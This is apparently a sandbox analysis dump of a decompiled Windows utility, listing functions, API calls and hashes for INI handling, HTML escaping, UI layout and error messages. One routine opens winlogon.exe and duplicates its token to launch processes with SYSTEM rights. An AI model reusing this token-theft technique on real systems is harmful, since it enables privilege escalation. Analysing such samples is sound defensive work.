                                                                                                                • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                                • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00406398(void* __eflags, wchar_t* _a4) {
                                                                                                                				void* __esi;
                                                                                                                				void* _t3;
                                                                                                                				int _t6;
                                                                                                                
                                                                                                                				_t3 = E00404AAA(_a4);
                                                                                                                				if(_t3 != 0) {
                                                                                                                					wcscpy(0x40fb90, _a4);
                                                                                                                					wcscpy(0x40fda0, L"general");
                                                                                                                					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
                                                                                                                					asm("sbb eax, eax");
                                                                                                                					 *0x40fe28 =  ~(_t6 - 1) + 1;
                                                                                                                					E00405F14(0x40fe30, L"charset", 0x3f);
                                                                                                                					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
                                                                                                                					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
                                                                                                                				}
                                                                                                                				return _t3;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                                • wcscpy.MSVCRT ref: 004063B2
                                                                                                                • wcscpy.MSVCRT ref: 004063C2
                                                                                                                • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                                  • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                • API String ID: 3176057301-2039793938
                                                                                                                • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                                • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 16%
                                                                                                                			E0040ADF1(signed short* __eax, void* __ecx) {
                                                                                                                				void* _t2;
                                                                                                                				signed short* _t3;
                                                                                                                				void* _t7;
                                                                                                                				void* _t8;
                                                                                                                				void* _t10;
                                                                                                                
                                                                                                                				_t3 = __eax;
                                                                                                                				_t8 = __ecx;
                                                                                                                				_t7 = 8;
                                                                                                                				while(1) {
                                                                                                                					_t2 =  *_t3 & 0x0000ffff;
                                                                                                                					if(_t2 != 0x3c) {
                                                                                                                						goto L3;
                                                                                                                					}
                                                                                                                					_push(_t7);
                                                                                                                					_push(L"&lt;");
                                                                                                                					L14:
                                                                                                                					_t2 = memcpy(_t8, ??, ??);
                                                                                                                					_t10 = _t10 + 0xc;
                                                                                                                					_t8 = _t8 + _t7;
                                                                                                                					L16:
                                                                                                                					if( *_t3 != 0) {
                                                                                                                						_t3 =  &(_t3[1]);
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					return _t2;
                                                                                                                					L3:
                                                                                                                					if(_t2 != 0x3e) {
                                                                                                                						if(_t2 != 0x22) {
                                                                                                                							if((_t2 & 0x0000ffff) != 0xffffffb0) {
                                                                                                                								if(_t2 != 0x26) {
                                                                                                                									if(_t2 != 0xa) {
                                                                                                                										 *_t8 = _t2;
                                                                                                                										_t8 = _t8 + 2;
                                                                                                                									} else {
                                                                                                                										_push(_t7);
                                                                                                                										_push(L"<br>");
                                                                                                                										goto L14;
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									_push(0xa);
                                                                                                                									_push(L"&amp;");
                                                                                                                									goto L11;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_push(0xa);
                                                                                                                								_push(L"&deg;");
                                                                                                                								L11:
                                                                                                                								_t2 = memcpy(_t8, ??, ??);
                                                                                                                								_t10 = _t10 + 0xc;
                                                                                                                								_t8 = _t8 + 0xa;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t2 = memcpy(_t8, L"&quot;", 0xc);
                                                                                                                							_t10 = _t10 + 0xc;
                                                                                                                							_t8 = _t8 + 0xc;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_push(_t7);
                                                                                                                						_push(L"&gt;");
                                                                                                                						goto L14;
                                                                                                                					}
                                                                                                                					goto L16;
                                                                                                                				}
                                                                                                                			}









                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                                • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                                                                                                                				struct HDWP__* _v8;
                                                                                                                				intOrPtr* _v12;
                                                                                                                				void _v534;
                                                                                                                				short _v536;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr _t42;
                                                                                                                				intOrPtr* _t95;
                                                                                                                				RECT* _t96;
                                                                                                                
                                                                                                                				_t95 = __ecx;
                                                                                                                				_v12 = __ecx;
                                                                                                                				if(_a4 == 0x233) {
                                                                                                                					_v536 = 0;
                                                                                                                					memset( &_v534, 0, 0x208);
                                                                                                                					DragQueryFileW(_a8, 0,  &_v536, 0x104);
                                                                                                                					DragFinish(_a8);
                                                                                                                					 *((intOrPtr*)( *_t95 + 4))(0);
                                                                                                                					E00404923(0x104, _t95 + 0x1680,  &_v536);
                                                                                                                					 *((intOrPtr*)( *_v12 + 4))(1);
                                                                                                                					_t95 = _v12;
                                                                                                                				}
                                                                                                                				if(_a4 != 5) {
                                                                                                                					if(_a4 != 0xf) {
                                                                                                                						if(_a4 == 0x24) {
                                                                                                                							_t42 = _a12;
                                                                                                                							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
                                                                                                                							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						E00402EC8(_t95 + 0x40);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_v8 = BeginDeferWindowPos(0xd);
                                                                                                                					_t96 = _t95 + 0x40;
                                                                                                                					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
                                                                                                                					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
                                                                                                                					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
                                                                                                                					EndDeferWindowPos(_v8);
                                                                                                                					InvalidateRect( *(_t96 + 0x10), _t96, 1);
                                                                                                                					_t95 = _v12;
                                                                                                                				}
                                                                                                                				return E00402CED(_t95, _a4, _a8, _a12);
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040421E
                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                                • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                  • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                  • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                                • String ID: $
                                                                                                                • API String ID: 2142561256-3993045852
                                                                                                                • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                                • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 55%
                                                                                                                			E00405B81(signed short __ebx) {
                                                                                                                				signed int _t21;
                                                                                                                				void* _t22;
                                                                                                                				struct HINSTANCE__* _t25;
                                                                                                                				signed int _t27;
                                                                                                                				void* _t35;
                                                                                                                				signed short _t39;
                                                                                                                				signed int _t40;
                                                                                                                				void* _t57;
                                                                                                                				int _t61;
                                                                                                                				void* _t62;
                                                                                                                				int _t71;
                                                                                                                
                                                                                                                				_t39 = __ebx;
                                                                                                                				if( *0x41c470 == 0) {
                                                                                                                					E00405ADF();
                                                                                                                				}
                                                                                                                				_t40 =  *0x41c468;
                                                                                                                				_t21 = 0;
                                                                                                                				if(_t40 <= 0) {
                                                                                                                					L5:
                                                                                                                					_t57 = 0;
                                                                                                                				} else {
                                                                                                                					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
                                                                                                                						_t21 = _t21 + 1;
                                                                                                                						if(_t21 < _t40) {
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							goto L5;
                                                                                                                						}
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
                                                                                                                				}
                                                                                                                				L6:
                                                                                                                				if(_t57 != 0) {
                                                                                                                					L21:
                                                                                                                					_t22 = _t57;
                                                                                                                				} else {
                                                                                                                					if((_t39 & 0x00010000) == 0) {
                                                                                                                						if( *0x40fb90 == 0) {
                                                                                                                							_push( *0x41c478 - 1);
                                                                                                                							_push( *0x41c45c);
                                                                                                                							_push(_t39);
                                                                                                                							_t25 = E00405CE7();
                                                                                                                							goto L15;
                                                                                                                						} else {
                                                                                                                							wcscpy(0x40fda0, L"strings");
                                                                                                                							_t35 = E00405EDD(_t39,  *0x41c45c);
                                                                                                                							_t62 = _t62 + 0x10;
                                                                                                                							if(_t35 == 0) {
                                                                                                                								L13:
                                                                                                                								_t25 = GetModuleHandleW(0);
                                                                                                                								_push( *0x41c478 - 1);
                                                                                                                								_push( *0x41c45c);
                                                                                                                								_push(_t39);
                                                                                                                								goto L15;
                                                                                                                							} else {
                                                                                                                								_t61 = wcslen( *0x41c45c);
                                                                                                                								if(_t61 == 0) {
                                                                                                                									goto L13;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t25 = GetModuleHandleW(_t57);
                                                                                                                						_push( *0x41c478 - 1);
                                                                                                                						_push( *0x41c45c);
                                                                                                                						_push(_t39 & 0x0000ffff);
                                                                                                                						L15:
                                                                                                                						_t61 = LoadStringW(_t25, ??, ??, ??);
                                                                                                                						_t71 = _t61;
                                                                                                                					}
                                                                                                                					if(_t71 <= 0) {
                                                                                                                						L20:
                                                                                                                						_t22 = 0x40c4e8;
                                                                                                                					} else {
                                                                                                                						_t27 =  *0x41c46c;
                                                                                                                						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
                                                                                                                							goto L20;
                                                                                                                						} else {
                                                                                                                							_t57 =  *0x41c458 + _t27 * 2;
                                                                                                                							_t14 = _t61 + 2; // 0x2
                                                                                                                							memcpy(_t57,  *0x41c45c, _t61 + _t14);
                                                                                                                							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
                                                                                                                							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
                                                                                                                							 *0x41c468 =  *0x41c468 + 1;
                                                                                                                							 *0x41c46c =  *0x41c46c + _t61 + 1;
                                                                                                                							if(_t57 != 0) {
                                                                                                                								goto L21;
                                                                                                                							} else {
                                                                                                                								goto L20;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t22;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                • wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                                  • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                                • wcslen.MSVCRT ref: 00405C20
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                • memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                • String ID: strings
                                                                                                                • API String ID: 3166385802-3030018805
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
                                                                                                                				char _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* __esi;
                                                                                                                				void* _t18;
                                                                                                                				intOrPtr* _t22;
                                                                                                                				void* _t23;
                                                                                                                				void* _t28;
                                                                                                                				int _t37;
                                                                                                                				intOrPtr* _t39;
                                                                                                                				intOrPtr* _t40;
                                                                                                                
                                                                                                                				_v8 = 0;
                                                                                                                				_t18 = OpenProcess(0x2000000, 0, _a8);
                                                                                                                				_v12 = _t18;
                                                                                                                				if(_t18 == 0) {
                                                                                                                					_t37 = GetLastError();
                                                                                                                				} else {
                                                                                                                					_t39 = _a4 + 0x800;
                                                                                                                					_a8 = 0;
                                                                                                                					E0040289F(_t39);
                                                                                                                					_t22 =  *((intOrPtr*)(_t39 + 4));
                                                                                                                					if(_t22 == 0) {
                                                                                                                						_t23 = 0;
                                                                                                                					} else {
                                                                                                                						_t23 =  *_t22(_v12, 2,  &_a8);
                                                                                                                					}
                                                                                                                					if(_t23 == 0) {
                                                                                                                						_t37 = GetLastError();
                                                                                                                					} else {
                                                                                                                						_a4 = _a8;
                                                                                                                						E0040289F(_t39);
                                                                                                                						_t40 =  *((intOrPtr*)(_t39 + 8));
                                                                                                                						if(_t40 == 0) {
                                                                                                                							_t28 = 0;
                                                                                                                						} else {
                                                                                                                							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
                                                                                                                						}
                                                                                                                						if(_t28 == 0) {
                                                                                                                							_t37 = GetLastError();
                                                                                                                						} else {
                                                                                                                							 *_a12 = _v8;
                                                                                                                							_t37 = 0;
                                                                                                                						}
                                                                                                                						CloseHandle(_a8);
                                                                                                                					}
                                                                                                                					CloseHandle(_v12);
                                                                                                                				}
                                                                                                                				return _t37;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                                  • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                                • String ID: winlogon.exe
                                                                                                                • API String ID: 1315556178-961692650
                                                                                                                • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                                • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00405236(short* __ebx, intOrPtr _a4) {
                                                                                                                				int _v8;
                                                                                                                				char _v12;
                                                                                                                				void _v2058;
                                                                                                                				void _v2060;
                                                                                                                				int _t35;
                                                                                                                				int _t41;
                                                                                                                				signed int _t48;
                                                                                                                				signed int _t49;
                                                                                                                				signed short* _t50;
                                                                                                                				void** _t52;
                                                                                                                				void* _t53;
                                                                                                                				void* _t54;
                                                                                                                
                                                                                                                				_t48 = 0;
                                                                                                                				_v2060 = 0;
                                                                                                                				memset( &_v2058, 0, 0x7fe);
                                                                                                                				_t54 = _t53 + 0xc;
                                                                                                                				 *__ebx = 0;
                                                                                                                				_t52 = _a4 + 4;
                                                                                                                				_v12 = 2;
                                                                                                                				do {
                                                                                                                					_push( *_t52);
                                                                                                                					_t6 = _t52 - 4; // 0xe80040cb
                                                                                                                					_push( *_t6);
                                                                                                                					_push(L"%s (%s)");
                                                                                                                					_push(0x400);
                                                                                                                					_push( &_v2060);
                                                                                                                					L0040B1EC();
                                                                                                                					_t35 = wcslen( &_v2060);
                                                                                                                					_v8 = _t35;
                                                                                                                					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
                                                                                                                					_t49 = _t48 + _v8 + 1;
                                                                                                                					_t41 = wcslen( *_t52);
                                                                                                                					_v8 = _t41;
                                                                                                                					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
                                                                                                                					_t54 = _t54 + 0x34;
                                                                                                                					_t52 =  &(_t52[2]);
                                                                                                                					_t23 =  &_v12;
                                                                                                                					 *_t23 = _v12 - 1;
                                                                                                                					_t48 = _t49 + _v8 + 1;
                                                                                                                				} while ( *_t23 != 0);
                                                                                                                				_t50 = __ebx + _t48 * 2;
                                                                                                                				 *_t50 =  *_t50 & 0x00000000;
                                                                                                                				_t50[1] = _t50[1] & 0x00000000;
                                                                                                                				return __ebx;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                • String ID: %s (%s)
                                                                                                                • API String ID: 3979103747-1363028141
                                                                                                                • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                                • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 78%
                                                                                                                			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                				void _v514;
                                                                                                                				short _v516;
                                                                                                                				void _v8710;
                                                                                                                				short _v8712;
                                                                                                                				int _t17;
                                                                                                                				WCHAR* _t26;
                                                                                                                
                                                                                                                				E0040B550(0x2204, __ecx);
                                                                                                                				_v8712 = 0;
                                                                                                                				memset( &_v8710, 0, 0x2000);
                                                                                                                				_t17 = GetDlgCtrlID(_a4);
                                                                                                                				_t34 = _t17;
                                                                                                                				GetWindowTextW(_a4,  &_v8712, 0x1000);
                                                                                                                				if(_t17 > 0 && _v8712 != 0) {
                                                                                                                					_v516 = 0;
                                                                                                                					memset( &_v514, 0, 0x1fe);
                                                                                                                					GetClassNameW(_a4,  &_v516, 0xff);
                                                                                                                					_t26 =  &_v516;
                                                                                                                					_push(L"sysdatetimepick32");
                                                                                                                					_push(_t26);
                                                                                                                					L0040B278();
                                                                                                                					if(_t26 != 0) {
                                                                                                                						E00406025(_t34,  &_v8712);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                • String ID: sysdatetimepick32
                                                                                                                • API String ID: 1028950076-4169760276
                                                                                                                • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                                • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E00404706(long __edi, wchar_t* _a4) {
                                                                                                                				short _v8;
                                                                                                                				void* _t8;
                                                                                                                				void* _t10;
                                                                                                                				long _t14;
                                                                                                                				long _t24;
                                                                                                                
                                                                                                                				_t24 = __edi;
                                                                                                                				_t8 = 0;
                                                                                                                				_t14 = 0x1100;
                                                                                                                				if(__edi - 0x834 <= 0x383) {
                                                                                                                					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
                                                                                                                					if(0 != 0) {
                                                                                                                						_t14 = 0x1900;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
                                                                                                                					_t10 = wcscpy(_a4, 0x40c4e8);
                                                                                                                				} else {
                                                                                                                					if(wcslen(_v8) < 0x400) {
                                                                                                                						wcscpy(_a4, _v8);
                                                                                                                					}
                                                                                                                					_t10 = LocalFree(_v8);
                                                                                                                				}
                                                                                                                				return _t10;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                                • wcslen.MSVCRT ref: 00404756
                                                                                                                • wcscpy.MSVCRT ref: 00404766
